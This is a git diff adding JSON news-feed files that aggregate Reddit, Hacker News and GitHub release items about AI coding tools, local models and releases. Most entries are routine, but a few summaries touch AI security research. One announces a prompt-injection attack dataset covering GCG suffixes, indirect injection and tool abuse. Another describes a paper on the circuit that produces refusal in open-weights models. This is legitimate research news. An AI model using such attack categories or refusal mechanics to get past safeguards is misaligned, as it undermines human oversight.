"https://reddit.com/r/ClaudeAI/comments/1sip8jd/labs_for_claude_certified_architect_foundations/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-11T17:28:37.000Z", + "summary": "While preparing for the exam I engineered 6 labs, one per scenario, covering all 5 domains and all 30 task statements. Each one walks you through building working, runnable code step by step, for hands-on practice with the architectures the exam covers.\n\n* Lab 01 - Customer Support Resolution Agent\n* Lab 02 - Code Generation Workflows\n* Lab 03 - Multi-Agent Research System\n* Lab 04 - Developer Productivity Agent\n* Lab 05 - CI/CD Integration\n* Lab 06 - Structured Data Extraction\n\n[https://github.", + "category": "ai_tools" + }, + { + "title": "FT - China’s Alibaba shifts towards revenue over open-source AI", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sip3hd/ft_chinas_alibaba_shifts_towards_revenue_over/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-11T17:23:20.000Z", + "summary": "[https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t](https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t)\n\n \nIs it true?", + "category": "ai_models" + }, + { + "title": "FlashAttention (FA1–FA4) in PyTorch - educational implementations focused on algorithmic differences [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1sim6y1/flashattention_fa1fa4_in_pytorch_educational/", + "source": "Reddit r/MachineLearning", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-11T15:33:13.000Z", + "summary": "I recently updated my FlashAttention-PyTorch repo so it now includes educational implementations of FA1, FA2, FA3, and FA4 in plain PyTorch.\n\nThe main goal is to make the progression across versions easier to understand from code.\n\nThis is not meant to be an optimized kernel repo, and it is not a hardware-faithful recreation of the official implementations. The point is to expose the algorithmic ideas and design changes without immediately going deep into CUDA/Hopper/Blackwell-specific details.\n", + "category": "ai_research" + }, + { + "title": "I built a structured reasoning framework for Claude — because \"good output\" isn't enough", + "url": "https://reddit.com/r/ClaudeAI/comments/1sil0me/i_built_a_structured_reasoning_framework_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-11T14:46:51.000Z", + "summary": "**I built a structured reasoning framework for Claude — because \"good output\" isn't enough**\n\nI kept running into the same problem: Claude gives a great answer, but I have no idea how it got there. Same prompt, different results. Complex tasks where I couldn't tell if the reasoning actually held up.\n\nSo I built CRC — Complex Reasoning Compiler. It's a 6-step Claude Skill that forces reasoning to be auditable, teachable, and human-controlled.\n\nThe core idea:\n\n* Every complex task goes through a f", + "category": "ai_tools" + }, + { + "title": "Update: the open-source 62K multimodal prompt injection dataset now has GCG suffixes, multi-turn orchestration, indirect injection, tool abuse, and more (v2 + v3 added overnight)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1siilrp/update_the_opensource_62k_multimodal_prompt/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-11T13:06:26.000Z", + "summary": "Posted here yesterday about the v1 cross-modal dataset. One of you suggested adding GCG adversarial suffixes and multi-turn attack coverage. That feedback turned into v2 and v3 being built and shipped within 24 hours. The dataset has gone from 47K to 62K samples.\n\nHuggingFace: https://huggingface.co/datasets/Bordair/bordair-multimodal\nGitHub: https://github.com/Josh-blythe/bordair-multimodal-v1/\nMIT licensed.\n\nThe repo's also picked up early interest from engineers at NVIDIA, PayPal, NetApp, and", + "category": "ai_models" + }, + { + "title": "Gemma 4 - Going Mad - - - Help!!!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1siia1t/gemma_4_going_mad_help/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-11T12:52:14.000Z", + "summary": "Hi All\n\nIm getting up to speed on LLMs and we are looking at Gemma4. \nWe are using a M3 Ultra with 512GB VRAM. So no dangers there.\n\nIm using opencode cli for these tests. However it doesnt appear to matter what I use the results are the same. Its all around tooling.\n\nI have re-downloaded all the models this morning post the fixes. These are the unsloth ones. \n\nIm running llama.cpp - which i build on the server and is bang up to date.\n\nSo in opencode CLI - if i give it this prompt - its runs", + "category": "ai_models" + }, + { + "title": "Curated 550+ free LLM tools for builders (APIs, local models, RAG, agents, IDEs)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sigg35/curated_550_free_llm_tools_for_builders_apis/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-11T11:22:38.000Z", + "summary": "I spent the whole day putting together a big list of **free or cheap LLM tools** that are actually useful if you’re building stuff.\n\nTried to focus more on **local models + dev tools** instead of those generic “1000 AI websites” type lists.\n\nIt includes:\n\n• local models (Ollama, Qwen, Llama etc) \n• free LLM APIs (OpenRouter, Groq, Gemini etc) \n• coding IDEs + CLI tools (Cursor, Qwen Code, Gemini CLI etc) \n• RAG stack tools (vector DBs, embeddings, frameworks) \n• agent frameworks and automati", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-12.json b/data/news-feed-2026-04-12.json new file mode 100644 index 0000000..e265916 --- /dev/null +++ b/data/news-feed-2026-04-12.json @@ -0,0 +1,168 @@ +{ + "generated": "2026-06-05T00:44:33.848Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-12", + "article_count": 10, + "archived_story_count": 109, + "articles": [ + { + "title": "JARVIS running on 3 servers as one fleet. Claude Code, Cursor, and OpenCode all coordinating.", + "url": "https://reddit.com/r/ClaudeAI/comments/1sj4o7y/jarvis_running_on_3_servers_as_one_fleet_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-12T04:34:19.000Z", + "summary": "One instance is enough, but where is the fun in that right? 🤣\n\nJARVIS across 3 servers, each running a different AI coding agent:\n\n\\- Hel2: Claude Code CLI\n\n\\- Hel1: Cursor CLI\n\n\\- Mainframe: OpenCode \n\nThey talk to each other over fleet MCP. Each has its own vector memory (Qdrant), runs its own tasks, and reports back to me on Telegram or work with each other from one point of contact. \n\nSame JARVIS, different hands. They don't just run. They coordinate.\n\nVideo is all 3 tmux sessions open at o", + "category": "ai_tools" + }, + { + "title": "Openclaw real costs: self hosting vs managed hosting vs API fees", + "url": "https://reddit.com/r/ChatGPT/comments/1sj6r9b/openclaw_real_costs_self_hosting_vs_managed/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-12T06:27:27.000Z", + "summary": "Everyone says openclaw is free and open source but what's the real monthly cost when you add everything up? Hosting, API fees, whatever else. How much are people paying for self-hosting vs managed and is the price difference worth?", + "category": "ai_tools" + }, + { + "title": "OK I installed bitsandbytes but still getting error - Help please - thanks", + "url": "https://reddit.com/r/StableDiffusion/comments/1sj1gi9/ok_i_installed_bitsandbytes_but_still_getting/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-12T01:55:27.000Z", + "summary": "Used terminal and installed it like so:\n\npip install --force-reinstall [https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release\\_main/bitsandbytes-1.33.7.preview-py3-none-win\\_amd64.whl](https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release_main/bitsandbytes-1.33.7.preview-py3-none-win_amd64.whl)\n\n \nGetting error and StableDiffusion does not run\n\nFile \"C:\\\\Users\\\\123\\\\Downloads\\\\StabilityMatrix-win-x64\\\\Data\\\\Packages\\\\", + "category": "creative_tools" + }, + { + "title": "Meta released new paper : Neural Computers", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sj782l/meta_released_new_paper_neural_computers/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-12T06:54:27.000Z", + "summary": "What they wish to convey is can AI act like a computer? the team tried training a video model to generate simulation for terminal and desktop and got decent results. check more details : https://youtu.be/Evcgg-LG\\_jA?si=0h0bnM7qUsqDcKCJ\n\npaper : https://arxiv.org/abs/2604.06425", + "category": "ai_models" + }, + { + "title": "Open source agent stack that actually works in 2026 (no hype)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sj6ke6/open_source_agent_stack_that_actually_works_in/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-12T06:16:49.000Z", + "summary": "been running this setup for a few months and wanted to share what actually works vs whats just github stars\n\nhermes agent (24k stars, MIT) - runs on your own machine or vps, connects to telegram/discord/whatsapp, persistent memory stored locally in sqlite. your data doesnt leave your network. pair it with ollama and local models for fully offline operation. the memory layer is what separates it from everything else.. your agent on day 30 actually knows your projects and preferences\n\neverything c", + "category": "ai_models" + }, + { + "title": "MiniMax M2.7 is NOT open source - DOA License :(", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sj2oqz/minimax_m27_is_not_open_source_doa_license/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-12T02:55:38.000Z", + "summary": "Commercial use is banned without prior written permission from MiniMax.\n\nAnd their definition of \"commercial\" is broad - covers paid services, commercial APIs, and even deploying a fine-tuned version for profit. Military use is also explicitly prohibited- interesting.\n\nSo you can't use the model or any outputs for anything commercial!\n\nI'm really starting to hate these \"open weights, closed license\" models...\n\nhttps://huggingface.co/MiniMaxAI/MiniMax-M2.7/blob/main/LICENSE", + "category": "ai_models" + }, + { + "title": "Does LTX 2.3 have good motion transfer?", + "url": "https://reddit.com/r/StableDiffusion/comments/1sj87tk/does_ltx_23_have_good_motion_transfer/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.9400000000000001, + "date": "2026-04-12T07:50:22.000Z", + "summary": "What are the best open source motion transfer workflows and models right now? Is it still Wan + SCAIL? Or LTX 2.3 have a better one?\n\n", + "category": "creative_tools" + }, + { + "title": "This is so good", + "url": "https://reddit.com/r/ClaudeAI/comments/1sj3icv/this_is_so_good/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.86, + "date": "2026-04-12T03:35:24.000Z", + "summary": "Claude code just created a whole gamified experience in the web. for my baby baby shower. Unique ids admin ui with count of RSVP the whole thing. All canvas over html in around 3 hrs because I tweaked a lot and also developed the whole api in c++ and published it to a domain created an AWS cloud front and managed to tied it to email sending. I’m officially wowed. ", + "category": "ai_tools" + }, + { + "title": "It seems ChatGPT leaked a JSON response (including API enpoint)", + "url": "https://reddit.com/r/ChatGPT/comments/1siyuyb/it_seems_chatgpt_leaked_a_json_response_including/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.86, + "date": "2026-04-11T23:52:55.000Z", + "summary": "idk if this is visible in network requests, but chatgpt responded with \\[Errno fetch [http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker\\_convo2im](http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker_convo2im) failed: 429: b'{\\\\n \"error\": {\\\\n \"message\": \"You're generating images too quickly. To ensure the best experience for everyone, we have rate limits in place. Please wait for 9 minutes before generating more images.\",\\\\n \"type\": \"images\",\\\\n \"param\": nul", + "category": "ai_tools" + }, + { + "title": "MiniMax M2.7 Is Now Open Source", + "url": "https://firethering.com/minimax-m2-7-agentic-model/", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.74, + "date": "2026-04-12T10:07:33.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-14.json b/data/news-feed-2026-04-14.json new file mode 100644 index 0000000..363235b --- /dev/null +++ b/data/news-feed-2026-04-14.json @@ -0,0 +1,255 @@ +{ + "generated": "2026-06-05T00:44:34.094Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-14", + "article_count": 15, + "archived_story_count": 271, + "articles": [ + { + "title": "hands on workshop: context engineering for multi agent systems [D]", + "url": "https://reddit.com/r/MachineLearning/comments/1skf122/hands_on_workshop_context_engineering_for_multi/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "mcp", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-13T15:56:23.000Z", + "summary": "hey everyone, sharing this because it's directly relevant to what a lot of people here are building.\n\npackt publishing is running a hands on workshop on april 25 on context engineering for multi agent systems with denis rothman.\n\nwhat gets covered:\n\n\\- semantic blueprints for multi agent orchestration\n\n\\- MCP integration for standardized agent tool use\n\n\\- context window management across agents\n\n\\- high fidelity RAG pipelines with verifiable citations\n\n\\- safeguards against prompt injection and", + "category": "ai_research" + }, + { + "title": "Docker sandbox templates for running Claude Code with a web/mobile UI (CloudCLI)", + "url": "https://reddit.com/r/ClaudeAI/comments/1slld23/docker_sandbox_templates_for_running_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-14T20:58:35.000Z", + "summary": "I maintain CloudCLI, an open source web/mobile UI for AI Coding agents like Claude Code, Gemini and Codex (https://github.com/siteboon/claudecodeui if you are not aware)\n\nWe recently added Docker Sandbox support and I wanted to share it here.\n\nThe idea is simple, Docker sandbox allows you to run agents in an isolated environment and we've created a template to also add a webui on top of it and interact with your sandbox instead of a terminal.\n\n`npx @cloudcli-ai/cloudcli@latest sandbox ~/my-proje", + "category": "ai_tools" + }, + { + "title": "How to make Codex (or any agent) do your work without any instructions (it learns by watching you!). Open-source", + "url": "https://reddit.com/r/ChatGPT/comments/1sljafu/how_to_make_codex_or_any_agent_do_your_work/", + "source": "Reddit r/ChatGPT", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-14T19:43:41.000Z", + "summary": "Hiii - here is a simple demo of how AgentHandover watches my screen and then instructs AI agent to do it like me without me explaining. \n\nAgentHandover watches how you work on your Mac, turns your workflows into reusable Skills, and lets agents like Codex, OpenClaw, etc. can execute them the way you do it by just typing /ah-skill-name and watch it do the magic.\n\nEach Skill captures the what, the why, and the how - steps, strategy, decision logic, guardrails, and your writing voice. And they're s", + "category": "ai_tools" + }, + { + "title": "pnpm v10.33.0 released", + "url": "https://github.com/pnpm/pnpm/releases/tag/v10.33.0", + "source": "GitHub Releases · pnpm", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.99, + "date": "2026-03-24T16:47:01.000Z", + "summary": "## Minor Changes\r\n\r\n* Added a new `dedupePeers` setting that reduces peer dependency duplication. When enabled, peer dependency suffixes use version-only identifiers (`name@version`) instead of full dep paths, eliminating nested suffixes like `(foo@1.0.0(bar@2.0.0))`. This dramatically reduces the number of package instances in projects with many recursive peer dependencies [#11070](https://github.com/pnpm/pnpm/issues/11070).\r\n\r\n## Patch Changes\r\n\r\n* Fail on incompatible lockfiles in CI when", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.37.2 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.37.2", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-04-13T20:19:57.000Z", + "summary": "## What's Changed\n* fix(patch): cherry-pick 9d741ab to release/v0.37.1-pr-24565 to patch version v0.37.1 and create version 0.37.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25322\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.37.1...v0.37.2", + "category": "ai_tools" + }, + { + "title": "Turbo v2.9.6 released", + "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.6", + "source": "GitHub Releases · Turbo", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-04-10T13:23:09.000Z", + "summary": "\n\n## What's Changed\n### create-turbo\n* chore: Update dependencies found in audits by @anthonyshew in https://github.com/vercel/turborepo/pull/12586\n### Examples\n* fix: Add missing `@types/node` to `with-svelte` example apps by @anthonyshew in https://github.com/vercel/turborepo/pull/12585\n### Changelog\n* docs: Add Bun equivalent for updating dependencies by @anthonyshew in https://github.com/vercel/turborepo/pul", + "category": "ai_tools" + }, + { + "title": "We're all building on top of something that changes under us every week, and nobody has a plan for that", + "url": "https://reddit.com/r/ClaudeAI/comments/1sl3yzt/were_all_building_on_top_of_something_that/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.9, + "date": "2026-04-14T09:46:57.000Z", + "summary": "I've been using Claude (Pro, now Max) for about 7 months, primarily for building and shipping small tools and automations for clients. I'm not complaining about Claude itself here , this is about a pattern I'm noticing across the entire AI tooling ecosystem that I think deserves a real conversation.\n\nEvery week, something changes. A model gets updated and suddenly the same prompt that worked reliably for two months produces different output. An API response structure shifts slightly. A feature g", + "category": "ai_tools" + }, + { + "title": "Vercel CLI vercel@51.2.1 released", + "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.2.1", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-04-14T07:15:49.000Z", + "summary": "### Patch Changes\n\n- Add `ai-gateway api-keys create` command for creating AI Gateway API keys with optional quota limits ([#15744](https://github.com/vercel/vercel/pull/15744))\n\n- Improve `vercel blob list-stores` with `--json` and `--no-projects`, exclude non-blob stores when the API returns a `type` field, and show a richer table for non-TTY output while keeping linked-project filtering, `--all`, and interactive store selection on TTY. ([#14653](https://github.com/vercel/vercel/pull/14653", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.38.0 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.0", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-14T23:21:55.000Z", + "summary": "## What's Changed\n* fix(cli): refresh slash command list after /skills reload by @NTaylorMullen in https://github.com/google-gemini/gemini-cli/pull/24454\n* Update README.md for links. by @g-samroberts in https://github.com/google-gemini/gemini-cli/pull/22759\n* fix(core): ensure complete_task tool calls are recorded in chat history by @abhipatel12 in https://github.com/google-gemini/gemini-cli/pull/24437\n* feat(policy): explicitly allow web_fetch in plan mode with ask_user by @Adib234 in https://", + "category": "ai_tools" + }, + { + "title": "My first impressions of Minimax M2.7 (Q5_K_M) vs Qwen 3.5 27b (Q8_0)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1slm3si/my_first_impressions_of_minimax_m27_q5_k_m_vs/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-14T21:25:57.000Z", + "summary": "I'm not sure if the AesSedai's Q5\\_K\\_M version of Minimax M2.7 is too much lobotomized or if the model itself is kind of weak. \n \nI did a simple experiment with both models running with the recommended parameters. The task was simply to generate some [AGENTS.md](http://AGENTS.md) files for a Python/Fast API/LangGraph project of mine (Roo Code /init command), which has some degree of complexity. \n \nMinimax runs painfully slowly on my setup, so I was expecting it to demolish Qwen 3.5... but", + "category": "ai_models" + }, + { + "title": "Refusal in open-weights models looks like a sparse gate -> amplifier circuit, and generalizes across 12 models from 6 labs (2B-72B)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sllajh/refusal_in_openweights_models_looks_like_a_sparse/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-14T20:55:57.000Z", + "summary": "Paper: [https://arxiv.org/abs/2604.04385](https://arxiv.org/abs/2604.04385)\n\nI've been trying to understand where refusal actually lives. How it works mechanistically. Arditi et al showed refusal can be steered with a single direction. What I looked at here is the mechanistic question: what circuit creates and amplifies that direction?\n\nMain result: Across 12 models from 6 labs, I keep finding a sparse **gate-amplifier** pattern.\n\nA mid-layer 'gate' attention head reads a detection-layer represe", + "category": "ai_models" + }, + { + "title": "Tencent HY-World 2.0 appears to be dropping on April 15 — open-source multimodal 3D world generation from Tencent Hunyuan", + "url": "https://reddit.com/r/StableDiffusion/comments/1sll638/tencent_hyworld_20_appears_to_be_dropping_on/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-14T20:51:17.000Z", + "summary": "Tencent’s Hunyuan team is apparently releasing **HY-World 2.0 tomorrow**, according to a teaser post from Tengfei Wang (Tencent Hunyuan): “Launching tomorrow — Tencent #HYWorld 2.0, an engine-ready World Model\" [Source](https://x.com/DylanTFWang/status/2043952886166761519)\n\nThe launch page is already live, and this looks like a major upgrade over HY-World 1.5 / WorldPlay.\n\n## What HY-World 2.0 does\n\nHY-World 2.0 is a multimodal world model that can generate persistent, explorable 3D environments", + "category": "creative_tools" + }, + { + "title": "Updated Minimax m2.7 still doesn't allow coding a product. But before the next riot starts, Ryan Lee has already confirmed that they are still working on the license, and sale of products built by m2.7 is permitted.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1slkjqp/updated_minimax_m27_still_doesnt_allow_coding_a/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-14T20:28:09.000Z", + "summary": "Reddit r/LocalLLaMA — 9 upvotes, 14 comments", + "category": "ai_models" + }, + { + "title": "2x Asus Ascent GX10 - MiniMax M2.7 AWQ - cloud providers are dead to me", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sli7xr/2x_asus_ascent_gx10_minimax_m27_awq_cloud/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-14T19:05:55.000Z", + "summary": "Hello,\n\nI've been on a quest to get something \"close enough\" of Opus 4.5 running locally, for agentic coding, as SWE with 15 years of experience.\n\nI tried with one spark (yeah I'm calling my Asus Ascent GX10 sparks - they're the same), with models like Qwen 3.5 122B-A10B, Qwen3-Coder-Next, M2.5-REAP, ... Nothing was scratching the itch, too much frustration. 128GB is simply not enough (for me) right now.\n\nSo I bought a second one (first one I paid 2800€, second one 2500€, plus 60€ cable - total ", + "category": "ai_models" + }, + { + "title": "Parisians: we're running an open source AI art hackathon with LTX + NVIDIA this Saturday", + "url": "https://reddit.com/r/StableDiffusion/comments/1slgzja/parisians_were_running_an_open_source_ai_art/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-14T18:22:37.000Z", + "summary": "Hack and train on H100s for a day w/ people from the open source community + reserachers. Full details [here](https://ados.events/hackathon)", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-15.json b/data/news-feed-2026-04-15.json new file mode 100644 index 0000000..bcef349 --- /dev/null +++ b/data/news-feed-2026-04-15.json @@ -0,0 +1,255 @@ +{ + "generated": "2026-06-05T00:44:34.272Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-15", + "article_count": 15, + "archived_story_count": 418, + "articles": [ + { + "title": "Qwen Code v0.14.5 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.14.5", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-15T15:33:06.000Z", + "summary": "## What's Changed\n* feat(cli/sdk): expose /context usage data in non-interactive mode and SDK API by @wenshao in https://github.com/QwenLM/qwen-code/pull/2916\n* feat(cli): add startup performance profiler by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3232\n* feat(core): implement fork subagent for context sharing by @wenshao in https://github.com/QwenLM/qwen-code/pull/2936\n* feat(vscode-ide-companion): add /account for account display by @qqqys in https://github.com/QwenLM/qwen-code/p", + "category": "ai_tools" + }, + { + "title": "MCP vs API?", + "url": "https://reddit.com/r/ClaudeAI/comments/1slr3qj/mcp_vs_api/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-15T00:52:13.000Z", + "summary": "I am trying to get deeper into utilizing Claude Code (trying to become more technical) as I have recently switched to the terminal and wanted some feedback on better understanding MCP vs APIs. \n \nTo me it seems like APIs are direct instructions on how to navigate and pull or push data between a product and another entity. MCP on the other hand seems like it is allowing the AI to dynamically use tools and definitions based on your current context.\n\nI have heard a lot of people say that API is ", + "category": "ai_tools" + }, + { + "title": "Built a Visual Studio Code extension to use OpenCode as a GUI sidebar instead of the terminal", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sml59n/built_a_visual_studio_code_extension_to_use/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-15T22:28:23.000Z", + "summary": "Hey everyone,\n\nI built a VS Code extension that brings OpenCode directly into your sidebar as a native panel, that uses the UI elements exactly as they are from the OpenCode Desktop app. No terminal needed, no browser tab. It just lives in your activity bar and works easily.\n\nWhat it does:\n\n* Runs OpenCode sessions inside a VS Code webview sidebar\n* Automatically uses whatever workspace folder you have open\n* Can auto-start a local OpenCode server when you open the sidebar\n* Keeps your session a", + "category": "ai_models" + }, + { + "title": "Open Ai Agent Dashboard for Monitoring, Memory, Performance and Audit Trail", + "url": "https://reddit.com/r/ChatGPT/comments/1sm2bkg/open_ai_agent_dashboard_for_monitoring_memory/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-15T10:39:22.000Z", + "summary": "Been building AI agents for about a year now and the thing that always drove me crazy is you deploy an agent, it runs for hours, and you have absolutely no idea what it did. The logs say \"task complete\" 47 times but did it actually do 47 different things or did it just loop the same task over and over?\n\nI had an agent burn through about $340 in API credits over a weekend because it got stuck retrying the same request. The logs showed 200 OK on every call. Everything looked fine. It just kept doi", + "category": "ai_tools" + }, + { + "title": "[P] Added 8 Indian languages to Chatterbox TTS via LoRA — 1.4% of parameters, no phoneme engineering [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1sltun8/p_added_8_indian_languages_to_chatterbox_tts_via/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-15T02:55:46.000Z", + "summary": "TL;DR: \nFine-tuned Chatterbox-Multilingual (Resemble AI's open-source TTS) to support Telugu, Kannada, Bengali, Tamil, Malayalam, Marathi, Gujarati, and Hindi using LoRA adapters + tokenizer extension. Only 7.8M / 544M parameters trained. Model + audio samples available.\n\n\\---\n\nThe Problem\n\nChatterbox-Multilingual supports 23 languages with zero-shot voice cloning, but no Dravidian languages (Telugu, Kannada, Tamil, Malayalam) and limited Indo-Aryan coverage beyond Hindi. That's 500M+ speakers ", + "category": "ai_research" + }, + { + "title": "Claude Code on desktop, redesigned for parallel agentic work.", + "url": "https://reddit.com/r/ClaudeAI/comments/1slictc/claude_code_on_desktop_redesigned_for_parallel/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.99, + "date": "2026-04-14T19:10:50.000Z", + "summary": "New sidebar for parallel sessions. Drag-and-drop layout. Integrated terminal. Run multiple agents from one window. \n\nNew tools make it easier to complete work without leaving the app.\n\nIntegrated terminal, in-app file editing, HTML + PDF preview, and a rebuilt diff viewer. Drag any panel into the layout that fits how you work. Three view modes when you want more (or less) signal.\n\nPlus more updates and customizations to fit how you work including SSH for Mac, keyboard shortcuts, and CLI plugin p", + "category": "ai_tools" + }, + { + "title": "I built a CLI that scans your project and auto-installs matching skills for Claude Code", + "url": "https://reddit.com/r/ClaudeAI/comments/1sm4at4/i_built_a_cli_that_scans_your_project_and/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.96, + "date": "2026-04-15T12:13:27.000Z", + "summary": "Hey r/ClaudeAI — I built a small tool to fix something that bugged me: every time I start a new project, picking the right skills from [skills.sh](http://skills.sh) is manual and 